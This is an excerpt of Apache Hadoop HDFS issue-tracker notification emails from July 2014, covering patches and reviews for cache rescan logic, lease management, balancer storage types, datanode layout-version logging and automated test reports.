> the 2nd or 3rd {{setNeedsRescan}} call may set {{needsRescan}} to true again. 
> So after the scan finishes, a new rescan is triggered in the next loop; that 
> second rescan is unnecessary and inefficient.





[jira] [Updated] (HDFS-6777) Supporting consistent edit log reads when in-progress edit log segments are included

2014-07-31 Thread James Thomas (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6777?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Thomas updated HDFS-6777:
---

Status: Patch Available  (was: Open)

> Supporting consistent edit log reads when in-progress edit log segments are 
> included
> 
>
> Key: HDFS-6777
> URL: https://issues.apache.org/jira/browse/HDFS-6777
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: qjm
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6777-design.pdf, HDFS-6777.patch
>
>
> For inotify, we want to be able to read transactions from in-progress edit 
> log segments so we can serve transactions to listeners soon after they are 
> committed. This JIRA works toward ensuring that we do not send unsync'ed 
> transactions back to the client by 1) discarding in-progress segments if we 
> have a finalized segment starting at the same transaction ID and 2) if there 
> are no finalized segments at the same transaction ID, using only the 
> in-progress segments with the largest seen lastWriterEpoch. See the design 
> document for more background and details.
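The two selection rules in the description can be sketched as follows (the {{Segment}} type and field names are made up for the example; they are not the real edit log classes): 1) discard an in-progress segment when a finalized segment starts at the same transaction ID, and 2) among the surviving in-progress segments, keep only those with the largest seen lastWriterEpoch.

```java
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

public class SegmentSelector {
    // Illustrative edit log segment descriptor.
    static final class Segment {
        final long startTxId;
        final boolean finalized;
        final long lastWriterEpoch;
        Segment(long startTxId, boolean finalized, long lastWriterEpoch) {
            this.startTxId = startTxId;
            this.finalized = finalized;
            this.lastWriterEpoch = lastWriterEpoch;
        }
    }

    static List<Segment> select(List<Segment> segments) {
        // Rule 1: note which start txids already have a finalized segment.
        Set<Long> finalizedStarts = new HashSet<>();
        for (Segment s : segments) {
            if (s.finalized) finalizedStarts.add(s.startTxId);
        }
        // Rule 2: find the largest writer epoch among surviving
        // in-progress segments.
        long maxEpoch = Long.MIN_VALUE;
        for (Segment s : segments) {
            if (!s.finalized && !finalizedStarts.contains(s.startTxId)) {
                maxEpoch = Math.max(maxEpoch, s.lastWriterEpoch);
            }
        }
        List<Segment> kept = new ArrayList<>();
        for (Segment s : segments) {
            if (s.finalized) {
                kept.add(s);  // finalized data is always safe to serve
            } else if (!finalizedStarts.contains(s.startTxId)
                       && s.lastWriterEpoch == maxEpoch) {
                kept.add(s);  // survived both rules
            }
        }
        return kept;
    }
}
```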





[jira] [Assigned] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA reassigned HDFS-6789:
---

Assignee: Akira AJISAKA

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081803#comment-14081803
 ] 

Yi Liu commented on HDFS-6783:
--

Thanks [~cmccabe], no need to apologize, our goal is to resolve the issue 
together :)

The new version of the patch resolves the issue in {{waitForRescanIfNeeded}}, 
but I don't see how it solves the issue in HDFS-6784; look at the following 
steps:
{code}
init state
completedScanCount = 0;
curScanCount = -1;
neededScanCount = 1;

setNeedsRecan--
completedScanCount = 0;
curScanCount = -1;
neededScanCount = 1;

in while loop--
completedScanCount = 0;
curScanCount = 1;
neededScanCount = 1;

setNeedsRescan-
completedScanCount = 0;
curScanCount = 1;
neededScanCount = 2;

rescan-
after rescan
completedScanCount = 1;
curScanCount = -1;
neededScanCount = 2;  <--- completedScanCount < neededScanCount, so there 
will still be another unnecessary rescan.
{code}
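The trace above can be reproduced with a tiny standalone simulation (illustrative counters only, not the real CacheReplicationMonitor code): a {{setNeedsRescan}} call that arrives while a scan is in flight leaves completedScanCount behind neededScanCount, so the monitor triggers one more rescan.

```java
public class RescanTrace {
    long completedScanCount = 0;
    long neededScanCount = 1;
    long curScanCount = -1;

    // Monitor enters its loop: snapshot the current needed count.
    void startScan() { curScanCount = neededScanCount; }

    // A rescan request arriving while the scan is running.
    void setNeedsRescan() { neededScanCount++; }

    // Scan finishes: only the snapshot taken at start is marked complete.
    void finishScan() {
        completedScanCount = curScanCount;
        curScanCount = -1;
    }

    boolean anotherRescanPending() {
        return completedScanCount < neededScanCount;
    }

    public static void main(String[] args) {
        RescanTrace t = new RescanTrace();
        t.startScan();
        t.setNeedsRescan();  // arrives mid-scan
        t.finishScan();
        System.out.println(t.anotherRescanPending()); // prints true
    }
}
```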

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In the monitor thread, needsRescan is set to false before the real scan 
> starts, so {{waitForRescanIfNeeded}} will return at the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}





[jira] [Commented] (HDFS-6757) Simplify lease manager with INodeID

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6757?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081799#comment-14081799
 ] 

Colin Patrick McCabe commented on HDFS-6757:


[~daryn]: yeah, we could provide both an inode ID and a path in the close op.  
Maybe that's the best option here...

> Simplify lease manager with INodeID
> ---
>
> Key: HDFS-6757
> URL: https://issues.apache.org/jira/browse/HDFS-6757
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Haohui Mai
>Assignee: Haohui Mai
> Attachments: HDFS-6757.000.patch, HDFS-6757.001.patch, 
> HDFS-6757.002.patch, HDFS-6757.003.patch, HDFS-6757.004.patch
>
>
> Currently the lease manager records leases based on path instead of inode 
> ids. Therefore, the lease manager needs to carefully keep track of the path 
> of active leases during renames and deletes. This can be a non-trivial task.
> This jira proposes to simplify the logic by tracking leases using inodeids 
> instead of paths.
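A minimal sketch of the proposed idea (the types and names are illustrative, not the real LeaseManager API): keying leases by inode id makes them stable across renames, since the id does not change while the path does.

```java
import java.util.HashMap;
import java.util.Map;

public class LeaseByInodeId {
    // Lease holder per inode id; a path-keyed map would need fix-ups
    // on every rename or delete under an open file.
    private final Map<Long, String> leaseHolderByInode = new HashMap<>();

    void addLease(long inodeId, String holder) {
        leaseHolderByInode.put(inodeId, holder);
    }

    // A rename changes the path but not the inode id, so no lease
    // bookkeeping is needed here at all -- the map is untouched.
    String holderAfterRename(long inodeId) {
        return leaseHolderByInode.get(inodeId);
    }

    void removeLease(long inodeId) {
        leaseHolderByInode.remove(inodeId);
    }

    public static void main(String[] args) {
        LeaseByInodeId lm = new LeaseByInodeId();
        lm.addLease(1001L, "client-1");
        System.out.println(lm.holderAfterRename(1001L)); // prints client-1
    }
}
```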





[jira] [Commented] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081798#comment-14081798
 ] 

Tsz Wo Nicholas Sze commented on HDFS-6794:
---

For the findbugs warnings, we should keep using dn instead of node in the code 
below.
{code}
 if (node == null) {
-  throw new IOException("Cannot mark " + b
-  + " as corrupt because datanode " + dn + " (" + dn.getDatanodeUuid()
+  throw new IOException("Cannot mark " + blk
+  + " as corrupt because datanode " + node + " (" + 
node.getDatanodeUuid()
   + ") does not exist");
 }
{code}

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).





[jira] [Updated] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6685:
--

   Resolution: Fixed
Fix Version/s: 2.6.0
 Hadoop Flags: Reviewed
   Status: Resolved  (was: Patch Available)

Thanks Arpit for reviewing the patches.

I have committed this.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.





[jira] [Comment Edited] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081793#comment-14081793
 ] 

Tsz Wo Nicholas Sze edited comment on HDFS-6685 at 8/1/14 1:23 AM:
---

Thanks Arpit and Vinay for reviewing the patches.

I have committed this.


was (Author: szetszwo):
Thanks Arpit for reviewing the patches.

I have committed this.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.





[jira] [Updated] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6796:
--

  Priority: Minor  (was: Major)
Issue Type: Improvement  (was: Bug)

+1 patch looks good.

(You are right that we should use "<" but not "==".  Thanks.)

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
>Priority: Minor
> Attachments: HDFS-6796.patch, HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there are more than 2 arguments.
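The per-option check described above (verifying that a value remains before consuming it, using "<" rather than "==") can be sketched as follows. The option name and the `parseThreshold` helper are hypothetical, not the Balancer's actual parser:

```java
class BalancerArgCheckSketch {
    // Before consuming the value of an option at index i, verify that a
    // value actually remains. The "i + 1 < args.length" form stays correct
    // even when further options follow, unlike a total-count "== 2" check.
    static double parseThreshold(String[] args, int i) {
        if (i + 1 >= args.length) {
            throw new IllegalArgumentException("-threshold requires a value");
        }
        return Double.parseDouble(args[i + 1]);
    }
}
```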





[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Attachment: hdfs-6780.002.patch

Fix a compile error

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch, hdfs-6780.002.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.
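A batched, iterator-returning listing can be sketched as below. This is a hypothetical client-side view using a plain `java.util.Iterator`; the real API returns Hadoop's `RemoteIterator` and fetches each batch over RPC:

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Iterator;
import java.util.List;
import java.util.NoSuchElementException;

class BatchedListingSketch {
    // Pulls results one batch at a time, so the server never has to
    // materialize the full listing in a single response.
    static Iterator<String> listInBatches(List<String> serverSide, int batchSize) {
        return new Iterator<String>() {
            private int fetched = 0;
            private final Deque<String> batch = new ArrayDeque<>();

            @Override
            public boolean hasNext() {
                if (batch.isEmpty() && fetched < serverSide.size()) {
                    int end = Math.min(fetched + batchSize, serverSide.size());
                    batch.addAll(serverSide.subList(fetched, end)); // one "RPC"
                    fetched = end;
                }
                return !batch.isEmpty();
            }

            @Override
            public String next() {
                if (!hasNext()) {
                    throw new NoSuchElementException();
                }
                return batch.poll();
            }
        };
    }
}
```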





[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Andrew Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081789#comment-14081789
 ] 

Andrew Wang commented on HDFS-6788:
---

It looks like precommit isn't picking this up for some reason. I manually
triggered a build.



> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause a performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).





[jira] [Commented] (HDFS-6757) Simplify lease manager with INodeID

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6757?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081786#comment-14081786
 ] 

Hadoop QA commented on HDFS-6757:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658724/HDFS-6757.004.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 9 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7517//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7517//console

This message is automatically generated.

> Simplify lease manager with INodeID
> ---
>
> Key: HDFS-6757
> URL: https://issues.apache.org/jira/browse/HDFS-6757
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Haohui Mai
>Assignee: Haohui Mai
> Attachments: HDFS-6757.000.patch, HDFS-6757.001.patch, 
> HDFS-6757.002.patch, HDFS-6757.003.patch, HDFS-6757.004.patch
>
>
> Currently the lease manager records leases based on path instead of inode 
> ids. Therefore, the lease manager needs to carefully keep track of the path 
> of active leases during renames and deletes. This can be a non-trivial task.
> This jira proposes to simplify the logic by tracking leases using inode IDs 
> instead of paths.
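The proposed simplification can be sketched as keeping leases in a map keyed by the immutable inode ID. This is a hypothetical structure for illustration; the real LeaseManager tracks considerably more state:

```java
import java.util.HashMap;
import java.util.Map;

class InodeLeaseSketch {
    // Leases keyed by inode ID. Because the ID never changes, a rename or
    // delete requires no path bookkeeping, unlike path-keyed leases.
    private final Map<Long, String> holderByInodeId = new HashMap<>();

    void addLease(long inodeId, String holder) {
        holderByInodeId.put(inodeId, holder);
    }

    String getHolder(long inodeId) {
        return holderByInodeId.get(inodeId);
    }

    void releaseLease(long inodeId) {
        holderByInodeId.remove(inodeId);
    }
}
```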





[jira] [Updated] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6797:


  Resolution: Fixed
   Fix Version/s: 2.6.0
  3.0.0
Target Version/s: 2.6.0
Hadoop Flags: Reviewed
  Status: Resolved  (was: Patch Available)

Committed to trunk and branch-2. Thanks for the contribution [~benoyantony].

> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During the upgrade we got the following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> After the upgrade completed, restarting the DN still shows a message about the 
> version difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This confuses operators into thinking the upgrade did not succeed, since the 
> data node's layout version appears not to be updated to the "new LV" value.
> In fact, it is the name node's layout version that is displayed as the "new LV" value.
> Since the data node and name node layout versions are now separate, the new 
> data node layout version should be shown as the "new LV".
> Thanks to [~ehf] who found and reported this issue.





[jira] [Updated] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6797:


Summary: DataNode logs wrong layoutversion during upgrade  (was: Misleading 
LayoutVersion information during data node upgrade)

> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During the upgrade we got the following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> After the upgrade completed, restarting the DN still shows a message about the 
> version difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This confuses operators into thinking the upgrade did not succeed, since the 
> data node's layout version appears not to be updated to the "new LV" value.
> In fact, it is the name node's layout version that is displayed as the "new LV" value.
> Since the data node and name node layout versions are now separate, the new 
> data node layout version should be shown as the "new LV".
> Thanks to [~ehf] who found and reported this issue.





[jira] [Commented] (HDFS-4916) DataTransfer may mask the IOException during block transfering

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4916?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081782#comment-14081782
 ] 

Hadoop QA commented on HDFS-4916:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12588510/4916.v0.patch
  against trunk revision .

{color:red}-1 patch{color}.  The patch command could not apply the patch.

Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7519//console

This message is automatically generated.

> DataTransfer may mask the IOException during block transfering
> --
>
> Key: HDFS-4916
> URL: https://issues.apache.org/jira/browse/HDFS-4916
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.0.4-alpha, 2.0.5-alpha
>Reporter: Zesheng Wu
>Priority: Critical
> Attachments: 4916.v0.patch
>
>
> When a new datanode is added to the pipeline, the client will trigger the 
> block transfer process. In the current implementation, the src datanode calls 
> the run() method of DataTransfer to transfer the block. This method masks 
> any IOException thrown during the transfer, so the client does not realize 
> that the transfer failed and mistakes the failed transfer for a successful one.





[jira] [Commented] (HDFS-6797) Misleading LayoutVersion information during data node upgrade

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081778#comment-14081778
 ] 

Hadoop QA commented on HDFS-6797:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658983/HDFS-6797.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7516//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7516//console

This message is automatically generated.

> Misleading LayoutVersion information during data node upgrade
> -
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During the upgrade we got the following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> After the upgrade completed, restarting the DN still shows a message about the 
> version difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This confuses operators into thinking the upgrade did not succeed, since the 
> data node's layout version appears not to be updated to the "new LV" value.
> In fact, it is the name node's layout version that is displayed as the "new LV" value.
> Since the data node and name node layout versions are now separate, the new 
> data node layout version should be shown as the "new LV".
> Thanks to [~ehf] who found and reported this issue.





[jira] [Commented] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081762#comment-14081762
 ] 

Arpit Agarwal commented on HDFS-6685:
-

+1 for the latest patch.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.





[jira] [Commented] (HDFS-6797) Misleading LayoutVersion information during data node upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081755#comment-14081755
 ] 

Arpit Agarwal commented on HDFS-6797:
-

Pending Jenkins.

> Misleading LayoutVersion information during data node upgrade
> -
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
